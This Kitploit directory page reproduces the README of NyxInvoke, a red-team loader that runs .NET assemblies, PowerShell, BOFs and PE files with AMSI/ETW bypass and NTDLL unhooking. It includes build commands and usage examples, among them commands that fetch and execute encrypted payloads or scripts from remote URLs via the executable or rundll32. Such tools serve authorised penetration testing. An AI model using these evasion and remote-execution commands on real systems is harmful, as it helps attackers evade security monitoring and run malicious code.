Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
NyxInvoke — NyxInvokeは、Patchless AMSIおよびETWバイパス機能を備えた、.NETアセンブリ、PowerShell、BOFを実行するためのRust CLIツールです。デュアルビルドサポート付き。 | Kitploit
ツール/GitHubGitHub/blacksnufkin/nyxinvoke
エクスプロイトIDS/IPS回避シェルコードポストエクスプロイトペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツールペイロード開発
GitHubblacksnufkin/nyxinvoke

NyxInvoke

NyxInvokeは、Patchless AMSIおよびETWバイパス機能を備えた、.NETアセンブリ、PowerShell、BOFを実行するためのRust CLIツールです。デュアルビルドサポート付き。

24330111年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
リポジトリを見る
共有

NyxInvoke

NyxInvoke は、.NET アセンブリ、PowerShell コマンド/スクリプト、Beacon Object Files (BOF)、PE ファイルの実行用に設計された多用途の Rust ベースのツールで、Ntdll Unhooking、パッチレス AMSI、ETW バイパス機能を内蔵しています。スタンドアロンの実行ファイルまたは DLL のどちらとしてもコンパイルできます。

特徴

  • .NET アセンブリの実行
  • PowerShell コマンドまたはスクリプトの実行
  • Beacon Object Files (BOF) の読み込みと実行
  • PE ファイル (EXE) の読み込みと実行
  • パッチレス AMSI (Anti-Malware Scan Interface) バイパスを内蔵
  • パッチレス ETW (Event Tracing for Windows) バイパスを内蔵
  • "PspCreateProcessNotifyRoutine" コールバックをトリガーせずに NTDLL アンフックを内蔵
  • AES 復号による暗号化ペイロードのサポート
  • 柔軟な入力オプション: ローカルファイル、URL、または組み込みデータ
  • デュアルビルドサポート: 実行ファイルまたは DLL としてコンパイル可能

ビルド

NyxInvoke は、実行ファイルまたは DLL のどちらとしてもビルドできます。次のコマンドを使用してください:

実行ファイル

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features exe --bin NyxInvoke

DLL

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features dll --lib

コンパイル済みの CLR、BOF、または PE データを含めるには、それぞれのフィーチャーを追加します:

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=exe,compiled_clr,compiled_bof,compiled_pe --bin NyxInvoke

または

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=dll,compiled_clr,compiled_bof,compiled_pe --lib

使用方法

実行ファイルモード

実行ファイルは次の主要な動作モードをサポートしています:

  1. CLR モード (.NET アセンブリ実行)
  2. PowerShell モード
  3. BOF モード (Beacon Object File 実行)
  4. PE モード (PE ファイル実行)

一般的な構文

NyxInvoke.exe <mode> [OPTIONS]

<mode> は、clr、ps、bof、pe のいずれかです。

DLL モード

DLL としてコンパイルされた場合、NyxInvoke は rundll32 を使用して実行できます。構文は次のとおりです:

rundll32.exe NyxInvoke.dll,NyxInvoke <mode> [OPTIONS]

モード固有のオプション

  1. CLR モード:
Execute Common Language Runtime (CLR) assemblies

Usage: NyxInvoke.exe clr [OPTIONS]

Options:
  -a, --args <ARGS>...            Arguments to pass to the assembly
  -b, --base <URL_OR_PATH>        Base URL or path for resources
  -k, --key <KEY_FILE>            Path to the encryption key file
  -i, --iv <IV_FILE>              Path to the initialization vector (IV) file
  -f, --assembly <ASSEMBLY_FILE>  Path or URL to the encrypted assembly file to execute
  -u, --unencrypted               Whether the assembly is unencrypted (default is encrypted)
  -h, --help                      Print help (see more with '--help')

Example: NyxInvoke.exe clr --assembly payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. BOF モード:
Execute Beacon Object Files (BOF)

Usage: NyxInvoke.exe bof [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the BOF
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --bof <BOF_FILE>      Path or URL to the encrypted BOF file to execute
  -u, --unencrypted         Whether the BOF is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe bof --bof payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. PE モード:
Execute Portable Executable (PE) files

Usage: NyxInvoke.exe pe [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the PE
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --pe <PE_FILE>        Path or URL to the encrypted PE file to execute
  -u, --unencrypted         Whether the PE is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe pe --pe payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. PowerShell モード:
Execute PowerShell commands or scripts

Usage: NyxInvoke.exe ps [OPTIONS]

Options:
  -c, --command <PS_COMMAND>  PowerShell command to execute
  -s, --script <PS_SCRIPT>    Path or URL to the PowerShell script to execute
  -h, --help                  Print help (see more with '--help')

Examples:
NyxInvoke.exe ps --command "Get-Process"
NyxInvoke.exe ps --script script.ps1

使用例

実行ファイルモード

  1. CLR モード (リモート実行):

    NyxInvoke.exe clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. PowerShell モード (スクリプト実行):

    NyxInvoke.exe ps --script C:\path\to\script.ps1
    
  3. BOF モード (ローカル実行):

    NyxInvoke.exe bof --key C:\path\to\bof_aes.key --iv C:\path\to\bof_aes.iv --bof C:\path\to\bof_data.enc --args "str=argument1" "int=42"
    
  4. PE モード (コンパイル済み実行):

    NyxInvoke.exe pe --args arg1
    

DLL モード

  1. CLR モード (リモート実行):

    rundll32.exe NyxInvoke.dll,NyxInvoke clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. PowerShell モード (直接コマンド実行):

    rundll32.exe NyxInvoke.dll,NyxInvoke ps --command "Get-Process | Select-Object Name, ID"
    
  3. BOF モード (コンパイル済み実行):

    rundll32.exe NyxInvoke.dll,NyxInvoke bof --args "str=argument1" "int=42"
    
  4. PE モード (ローカル実行・暗号化なし):

    rundll32.exe NyxInvoke.dll,NyxInvoke pe -u --pe C:\path\to\pe.exe --args arg1 arg2
    

テストリソース

resources ディレクトリには、NyxInvoke の機能をテストするためのファイルがいくつかあります:

  1. 暗号化 CLR アセンブリ (Seatbelt):

    • ファイル: clr_data.enc
    • 説明: システム情報を収集する C# プロジェクトである Seatbelt ツールの暗号化バージョン。
    • 使用例:
      NyxInvoke.exe clr --key resources/clr_aes.key --iv resources/clr_aes.iv --assembly resources/clr_data.enc --args AntiVirus
      
  2. 暗号化 BOF (ディレクトリ一覧):

    • ファイル: bof_data.enc
    • 説明: 指定されたファイルに対するユーザー権限を一覧表示する暗号化された Beacon Object File。ワイルドカードに対応しています。
    • 使用例:
      NyxInvoke.exe bof --key resources/bof_aes.key --iv resources/bof_aes.iv --bof resources/bof_data.enc --args "wstr=C:\Windows\system32\cmd.exe"
      
  3. 暗号化 PE (メッセージボックス):

    • ファイル: pe_data.enc
    • 説明: メッセージボックスを表示する暗号化された PE ファイル。
    • 使用例:
      NyxInvoke.exe pe
      
  4. PowerShell (メッセージボックス):

    • ファイル: ps.ps1
    • 説明: メッセージボックスを表示する PowerShell スクリプト。
    • 使用例:
      NyxInvoke.exe ps -s http://example.com/ps.ps1
      

スクリーンショット

  • DLL コンパイル版 CLR 実行

Screenshot 2024-09-18 123147

  • EXE リモート BOF 実行

Screenshot 2024-09-18 123410

  • DLL コンパイル版 EXE 実行

pe

  • DLL PowerShell スクリプト実行

Screenshot 2024-09-18 123547

法的通知

このツールは教育および許可されたテスト目的のみに使用してください。どの環境で使用する前にも、適切な許可を必ず取得してください。

クレジット

  • @yamakadi の clroxide プロジェクト
  • @hakaioffsec の coffee プロジェクト
ツールをダウンロード